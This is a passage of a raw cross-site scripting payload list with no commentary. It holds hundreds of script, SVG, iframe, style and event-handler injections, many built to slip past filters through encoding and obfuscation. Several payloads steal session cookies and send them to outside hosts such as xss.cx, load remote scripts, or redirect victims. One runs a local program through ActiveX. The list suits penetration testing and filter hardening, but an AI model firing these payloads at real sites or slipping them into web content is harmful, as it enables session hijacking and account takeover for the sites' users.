log(*num*) : null; </script> <script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) confirm(c[1]); }catch(e){} }; xdr.send(); </script> <script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());} document.getElementById(%22safe123%22).click(test); </script> "/><script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); confirm(RegExp.%241); } } xmlHttp.send(null); }; </script># <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); confirm(RegExp.%241); } } xmlHttp.send(null); }; </script> <script> var+x+=+showModelessDialog+(this); confirm(x.document.cookie); </script> "/><script x> confirm(1) </script 1=2 <script x> confirm(1) </script 1=2 <script/%00%00v%00%00>confirm(/@jackmasa/)</script> and %c0″//(%000000%0dconfirm(1)// <script>({0:#0=confirm/#0#/#0#(0)})</script> <script>(0)['constructor']['constructor']("\141\154\145\162\164(1)")();</script> "<script>1-confirm(0);</script>"/> "/><script>+-+-1-+-+confirm(1)</script> <script>+-+-1-+-+confirm(1)</script> <script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});confirm(Safe.get())</script> <script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return 
document.cookie}});confirm(Safe.get())</script> <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> <script>a='abc\*chr*\';log(*num*)//def';</script> "<script>'confirm(0)%3B<%2Fscript>" "\"><script>'confirm(0)%3B<%2Fscript>", <script>'confirm(0)%3B<%2Fscript> ><script>'confirm(0)%3B<%2Fscript> "<script>confirm(0);</script>" "><"script">"confirm(0)"</"script"> "\"><script>confirm(0)</script>", <script>confirm(0);</script> ><script>confirm(0)</script> "'><script>confirm(1)</script>", <sc'+'ript>confirm(1)</script> <script>confirm(1)</script> >"<>"<script>confirm(1)</script> [<script>]=*confirm(1)</script> ∀㸀㰀script㸀confirm(1)㰀/script㸀 <%<!--'%><script>confirm(1);</script --> <%<!--'%><script>confirm(1);</script --> "/><script>confirm(1);</script><img src=x onerror=x.onerror=prompt(0)> "\"/><script>confirm(1);</script><img src=x onerror=x.onerror=prompt(0)>" >"<>"<script>confirm(2)</script> <script>confirm(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script> "<script>confirm(String.fromCharCode(88,83,83));</script>" "\"><script>confirm(String.fromCharCode(88,83,83));</script>", <script>confirm(String.fromCharCode(88,83,83));</script> ><script>confirm(String.fromCharCode(88,83,83));</script> <script>/*confirm("Woops");*/</script> <script>confirm(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script> <script>confirm(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script> <script>confirm(document.head.childNodes[3].text)</script> <script>confirm(document.head.innerHTML.substr(146,20));</script> >"><script>confirm(document.location)</script>& <script>confirm(""no")</script> <script>confirm(x.y[0])</script> <script>confirm(x.y.x.y.x.y[0]);confirm(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script> "'`><script>a=/xss;*chr*;i=0;log(*num*);a/i;</script> 
"`'><script>*chr*log(*num*)</script> <script>document.body.innerHTML="<h1>XSS-Here</h1>"</script> <script>document.write(Array(184).join('<marquee>'))</script> "/><script>document.write("<img src=//xss.cx/" + document.cookie + ">")</script> <script>document.write("<img src=//xss.cx/" + document.cookie + ">")</script> <script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });confirm(Safe.get.apply(null, arguments));})();</script> <script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); <script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); <script>if("x\*chr*".length==1) { log(*num*);}</script> </script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'> "`'><script>lo*chr*g(*num*)</script> "`'><script>lo*chr*g(*num*)</script> "'`><script>log*chr*(*num*)</script> <script/onload=confirm(1)></script> \"><script>prompt(1)</script> </script><script>confirm(3)</script> </script><script>/*var a="/*""'/**/;confirm(1);//</script> <script>({set/**/$($){_/**/setter=$,_=1}}).$=confirm</script> <script/src=data:text/javascript,alert(1)></script> <script/src=data:text/javascript,alert(1)></script> ? 
"/><script+src=data:,confirm(1)<!-- <script+src=data:,confirm(1)<!-- "/><script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script ???????????? <script/src=//xss.cx>/* <script>str='';for(i=0;i<0xefff;i++){str+='<script>AAAAAA';};document.write('<svg>'+str+'</svg>');</script> </script><svg '//" </script><svg onload='-/"/-confirm(1)//' </script><svg onload='-/"/-confirm(1)//'" <script>try{eval("<></>");logBoolean(1)}catch(e){logBoolean(0)};</script> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/v>confirm(/@jackmasa/)</script> <script>-{valueOf:location,toString:[].pop,0:'vbscript:confirm%281%29',length:1}</script> <script>var location={};</script> <script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){confirm(request.responseText.substr(150,41));}</script> <script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); confirm(ta.value.match(/cookie = '(.*?)'/)[1])</script> <script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script> <script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true 
};var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _confirm = confirm;confirm = function() { confirm = _confirm };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });confirm(get());})();};safe123.click();</script># `'"><script>window['log*chr*'](*num*)</script> '<script>window.onload=function(){document.forms[0].message.value='1';}</script> <script>x="confirm(1)".replace(/.+/,eval)//"</script> <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});confirm(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script> <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){confirm(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script> <script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){confirm(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script> <script>x=""!=prompt(9)!="";y=42;</script> <script>x=""%prompt(9)%"";y=42;</script> <script>x=""&&prompt(9)&&"";y=42;</script> <script>x=""&prompt(9)&"";y=42;</script> <script>x=""*prompt(9)*"";y=42;</script> <script>x=""+prompt(9)+"";y=42;</script> <script>x=""-prompt(9)-"";y=42;</script> <script>x=""/prompt(9)/"";y=42;</script> <script>x=""<<prompt(9)<<"";y=42;</script> <script>x=""<=prompt(9)<="";y=42;</script> <script>x=""<prompt(9)<"";y=42;</script> 
<script>x=""===prompt(9)==="";y=42;</script> <script>x=""==prompt(9)=="";y=42;</script> <script>x="">=prompt(9)>="";y=42;</script> <script>x="">>>prompt(9)>>>"";y=42;</script> <script>x="">>prompt(9)>>"";y=42;</script> <script>x="">prompt(9)>"";y=42;</script> <script>x=""?prompt(9):"";y=42;</script> <script>x=""^prompt(9)^"";y=42;</script> <script>x=""|prompt(9)|"";y=42;</script> <script>x=""||prompt(9)||"";y=42;</script> "><scri<script></script>pt>confirm(document.cookie);</scri<script></script>pt> <scri\x00pt>confirm(1);</scri%00pt> setTimeout(['confirm(4)']); <span id="x" data-constructor=oops></span><script>confirm(x.dataset.constructor)</script> stop, open, print && confirm(1) </style  ><script   :-(>/**/confirm(document.location)/**/</script   :-( <style>body{font-size: 0;} h1{font-size: 12px !important;}</style><h1><?php echo "<hr />THIS IMAGE COULD ERASE YOUR WWW ACCOUNT, it shows you the PHP info instead...<hr />"; phpinfo(); __halt_compiler(); ?></h1> <style>*{font-family:'Serif}';x[value=expression(confirm(URL=1));]{color:red}</style> <style>*{-o-link:'data:text/html,<svg/onload=confirm(5)>';-o-link-source:current}</style><a href=1>aaa <style/onload = !-confirm(1)> <style/onload=confirm(1)> <style/onload="javascript:if('[object Object]'=={}&&1==[1])confirm(1);"> <style/onload=<!--	> confirm (1)> <style/onload=prompt('XSS') <style>p[foo=bar{}*{-o-link:'javascript:confirm(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style> <///style///><span %2F onmousemove='confirm(1)'>SPAN <style>//<!--</style> -->*{x:expression(confirm(4))}//<style></style> <svg contentScriptType=text/vbs><script>MsgBox+1 <svg contentScriptType=text/vbs><script>XSS <svg id=1 onload=confirm(1)> <svg onload=confirm(1) "><svg onload="confirm(7)"> <svg onload="confirm(7)"> <svg onload=eval(URL)> <svg onload=eval(document.cookie)> <svg onload=eval(window.name)> <svg xml:base="data:text/html,<script>confirm(1)</script>"><a xlink:href="#"><circle 
r="40"></circle></a></svg> <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:confirm(1)"></g></svg> <svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:confirm(1)" begin="0s" dur="0.1s" fill="freeze"/> <svg></ y="><x" onload=confirm(4)> <svg><doh onload=confirm(1)> <svg><image x:href="data:image/svg-xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='confirm(1)'%3E%3C/svg%3E"> "<svg/onload=confirm(0);prompt(0);>" <svg/onload=confirm(0);prompt(0);> <svg/onload=confirm(1) "/><svg/onload=confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83));prompt(0)> "\"/><svg/onload=confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83));prompt(0)>" <svg/onload='javascript0x00:void(0)%00?void(0):confirm(1)'> "<svg/onload=prompt(0);>" <svg/onload=prompt(0);> "<svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>" "\"><svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>", <svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);> ><svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);> <svg/onload=window.onerror=confirm;throw/5/;// <svg/onload=window.onerror=confirm;throw/XSS/;// <svg/onload=window.onerror=confirm;throw/XSS/;//" <svg><script ?>confirm(1) <svg><script ?>confirm(1); <svg><script onlypossibleinopera:-)> confirm(1) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' <svg><script xlink:href=data:,window.open('https://www.google.com/')></script <svg><script><![CDATA[\]]><![CDATA[u0061]]><![CDATA[lert]]>(1)</script> "/><svg><script>//
confirm(1);</script </svg> <svg><script>//
confirm(1);</script </svg> <svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script> <svg><script>confirm(/1/)</script> <svg><script>confirm("");confirm('yes')//no")</script> <svg><script>a<svg//onload=confirm(2) />lert(1)</script> <svg><script>location=<>javascript&#x3A;confirm(1)<!/></script> <svg><script>/**/confirm(3)//*/</script></svg> <svg><style>{font-family:'<iframe/onload=confirm(1)>' <svg><style>*{font-family:'<svg onload=confirm(1)>';}</style></svg> <svg><style><img src=x onerror=confirm(1)></svg> </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>confirm(1) ?t=confirm(1)&k7="><svg/t='&k8='onload='/&k9=/+eval(t)' test=scriptx=document.createElement(%27script%27);x.innerHTML=%27confirm(location)%27;document.body.appendChild(x);/script¬bot=UzXGjMCo8AoAAFUcKTEAAAAN <textarea autofocus onfocus=confirm(3)> <textarea id=ta onfocus=%22write('<script>confirm(1)</script>')%22 autofocus></textarea> <textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520confirm(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea> "/><textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));confirm(ta.value.match(/cookie = '(.*?)'/)[1])</script> <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));confirm(ta.value.match(/cookie = '(.*?)'/)[1])</script> <textarea name='file"; filename="test.<img src=a onerror=document&#46;location&#61;&#34;http:&#47;&#47;evil&#46;site&#34;>'> "<textarea onmousemove='confirm(1);'>" 
<textarea></textarea>test<!-- </textarea><img src=xx: onerror=confirm(1)> --> </title><frameset><frame src="data:text/html, fill the whole page and overlap everything<script>confirm(1)</script>"> </title><frameset><frame src="data:text/html,<script>confirm(1)</script>"> <ul><li><svg onload="confirm(1)"></li></ul> <!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:confirm(document.location);"> <var onmouseover="prompt(1)">On Mouse Over</var> <var onmouseover="prompt(1)">On Mouse Over</var>? "<video src=. onerror=prompt(0)>" <video src=. onerror=prompt(0)> <video src="x" onloadstart="confirm(1)"> <video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23 <video><source o?UTF-8?Q?n?error="confirm(1)"> <x data-bind=".:confirm(1)"> <x data-bind=".:\u0061lert(1)"> <x onload'=confirm(1) < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < \x3C > > \x3E < < \x3c > > \x3e <xml id=cdcat><note><to>%26lt;span style=x:exp<![CDATA[r]]>ession(confirm(3))%26gt;hello%26lt;/span%26gt;</to></note></xml><table border=%221%22 datasrc=%22%23cdcat%22><tr><td><span datafld=%22to%22 DATAFORMATAS=html></span></td></tr></table> <?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/> <xmp><img alt="</xmp><img src=xx:x onerror=confirm(1)//"> xss--><!--<script>xss x”</title><img src%3dx onerror%3dconfirm(1)> @"><img src=x/onerror=confirm(1)>xss <script>x=new ActiveXObject("WScript.Shell");x.run('calc');</script> "><<x>script>confirm(2)<<x>/<x>script> <img src=x onerror="document.location='http://xss.cx'";> !#$%&'*+-/=?^_`{}|[email protected] ~~)1(trela+tpircsavaj'.split('').reverse().join('').split('~').join(String.fromCharCode(47)).split('+').join(String.fromCharCode(58))).concat(' <xml id=cdcat><note><to>%26lt;span 
style=x:exp<![CDATA[r]]>ession(confirm(3))%26gt;hello%26lt;/span%26gt;</to></note></xml><table border=%221%22 datasrc=%22%23cdcat%22><tr><td><span datafld=%22to%22 DATAFORMATAS=html></span></td></tr></table> <style/></style><img src=1 onerror=confirm(1)></style> <script> x="<%"; </script> <div title="%></script>"<img src=1 onerror=confirm(1)>"></div> <? foo="><script>confirm(1)</script>"> data:text/html,/*<img src=x '-confirm(1)-' onerror=confirm(1)>*/confirm(1) '">><marquee><img src=x onerror=confirm(1)></marquee> <div contextmenu=x>right-click<menu id=x onshow=confirm(1)> "><b/onclick="javascript:window.window.window['confirm'](1)">bold <body language=vbs onload=window.location='data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+'> <IFRAME/SRC=DATA:TEXT/HTML;BASE64,ICA8U0NSSVBUIC8NU1JDPSINSFRUUFM6DS8NDS8NSEVJREVSSS5DSC96DSINID4NPC9TQ1JJUFQNDT5> %uff1cscript%uff1econfirm%uff0876310%uff09%uff1c/script%uff1e <script>``.constructor.constructor`confirm\`1\````</script> eval("\x61\x6c\x65\x72\x74\x28\x31\x29”) <script>var%20x%20=%20“a”;%20confirm(1);//”;</script> <source srcset="x"><img onerror="confirm(5)"></picture> <svg><script>confirm`1`<p><svg><script>confirm`1`<p> <script>``.constructor.constructor`confirm\`1\````</script> <i/style=x=x/**/(confirm(1))('\')expression\')> <i/style=x=x/**/n(confirm(1))('\')expressio\')> <div style='x:anytext/**/xxxx/**/n(confirm(1)) ("\"))))))expressio\")'>aa</div> // <script>write(“<img/src=//xss.cx/?”+cookie.replace(/\s/g,"")+“>”)></script> <base href="javascript:\"> <a href="//%0aconfirm(2);//">XSS</a> <base href="javascript:\"> <a href="//%0a%0dconfirm(2);//">XSS</a> <base href="javascript:\"> <a href="//%00confirm(2);//">XSS</a> <base href="javascript:\"> <a href="//xss.cx/xss.js">XSS</a> <script src="//⒕₨"></script>) <anything onmouseover=javascript:confirm(1)> <%00/title> <""/title> </title""> </title id=""> <a href='javascript:http://@cc_on/confirm%28location%29'>click</a> <img 
src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="> <a href="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="><img src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></a> "> "><iframe src=http://xss.cx onload=confirm(5) <<iframe src=a> "><iframe src=http://xss.cx onload=confirm(8) < % E2% 88% 80% E3% B8% 80% E3% B0% 80script% E3% B8% 80confirm% 281% 29% E3% B0 % 80 80/script% E3% B8% "><svg/onload=prompt(1)> "onresize=prompt(1)> <svg/onload=prompt(1) <svg><script>prompt(1)<b> <svg><script>prompt(1)</script> <script>eval.call`${'prompt\x281)'}`</script> <script>prompt.call`${1}`</script> --!><svg/onload=prompt(1) <p class="comment" title=""><svg/a="></p> <p class="comment" title=""onload='/*"></p> <p class="comment" title="*/prompt(1)'"></p> "><svg/a=#"onload='/*#*/prompt(1)' "><script x=#"async=#"src="//⒛₨ [U+2028]prompt(1)[U+2028]--> <ſvg><ſcript/href=//⒕₨> <ſcript/async/src=//⒛₨> <img src=""><SCRIPT/ASYNC/SRC="/〳⒛₨"> "><script>`#${prompt(1)}#`</script> 
<iframe/*%%%%25%%%25*/src='javascript:vbscript:%0b%0a/**/;//:http://www.google.com/?=%0a/**/javascript:%0a/*oleeeeeeeeeeeeeee*/alert(2);'> <A HREF="javascript	:alert(1)"> <%= puts "test" %> '"--></style></script><script>alert(0x0009BE)</script> <a href="javascript:history:alert(this.history.length)">click</a> xss=<link rel=import href=http://xss.cx/xss.js > <% a=%><iframe/onload=alert(1)//> <%/z=%><p/onresize=alert(1)//> <%/z=%><p/onresize=alert(1)//> <xml/></xml><iframe/onload=alert(1)> <xmp/></xmp><iframe/onload=alert(1)> <comment/></comment><iframe/onload=alert(1)> <fORm/hello^waf/aCTIon=j	avas	cript
:alert/**/(docu	ment.coo	kie)><InPuT/TyPe=submit <iframe onload="(function*(){}).constructor('alert(location)')().next()"> <iframe%20onload="new%20Promise($=>alert(location))"> <iframe onload=alert.call(...[top,location])> <iframe onload=`${alert(location)}`> <title/></title><iframe/onload=alert(1)> <element onpointerover=alert(1)> <div/style=content:url(data:image/svg+xml);visibility:visible onmouseover=confirm(1)>Bring-Mouse-Over-Me</div> <element onpointerover=alert(1)> <a b="c">d</a> <![<CDATA[C%Ada b="c":]]]> <![ <![C b="c"> <![CDb m="c"> <![CDAĹĹ@ <![CDAT<! <!DOCTY a=<script>alert(1);/*&b=*/</script> <!DOCTY. <?xml version="2.666666666666666666667666666"> <?xml standalone?> <script>a="<!--";//</script>alert(1)--></script> <script>a="<%"//</script>alert(1)//%></script> <svg><script xlink:href="url(#)"></script></svg> <base href="mailto://any/<img src="bod#y"></script> \x3Cscript\x3Ealert(document.domain);\x3C\x2Fscript\x3E data:text/html<svg/onload=parentNode.parentNode.parentNode[/locatio/.source+/n/.source]='javascript:confirm(4)'//> <math><XSS href="javascript:alert(location)">xss <math><mrow href=javascript:alert(1)>XSS</mrow></math> <input+name=xss+value="%26lt;script>alert%26lpar;1)%26lt;/script>"> <script>+{[atob`dG9TdHJpbmc`]()alert`1`}</script> <script>[{get[alert(1)]()false}]</script> <script>a = {get[alert`1`](){}}</script> <svg><a xyz:href=123><text>test</text></svg> /* RFI STOP */